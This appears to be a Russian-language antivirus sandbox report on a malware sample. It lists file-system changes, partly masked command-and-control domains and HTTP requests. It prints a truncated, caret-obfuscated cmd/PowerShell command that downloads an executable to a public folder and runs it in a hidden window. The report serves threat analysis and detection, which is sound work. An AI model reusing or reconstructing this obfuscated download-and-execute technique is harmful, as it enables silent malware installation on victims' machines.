Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"^s^et ^G^TK= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hct^ac^}^;^k^a^er^b^;^H^ij^$ ^me^tI^-e^k^ovnI^;)^Hi^j$^ ^,z^MP^$(^el^i^F^d^aolnwo^D^.pC^a^${^yr^t{)^zPb^$ n^i^ zM^P$(^hca^er^o^f;^'^e^xe^.^'...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\461.exe
Удаляет следующие файлы
- C:\users\public\461.exe
Сетевая активность
Подключается к
- 'ku##y.shop':80
- 'ka###el.info.pl':80
- 'ka###el.info.pl':443
TCP
Запросы HTTP GET
- http://ku##y.shop/7
- http://ka###el.info.pl/QS6o3Vr
Другие
- 'ka###el.info.pl':443
UDP
- DNS ASK mo####anmohamad.com
- DNS ASK ma####hirts.site
- DNS ASK ku##y.shop
- DNS ASK kr###-vanna.ru
- DNS ASK ka###el.info.pl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"^s^et ^G^TK= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hct^ac^}^;^k^a^er^b^;^H^ij^$ ^me^tI^-e^k^ovnI^;)^Hi^j$^ ^,z^MP^$(^el^i^F^d^aolnwo^D^.pC^a^${^yr^t{)^zPb^$ n^i^ zM^P$(^hca^er^o^f;^'^e^xe^.^'...' (со скрытым окном)
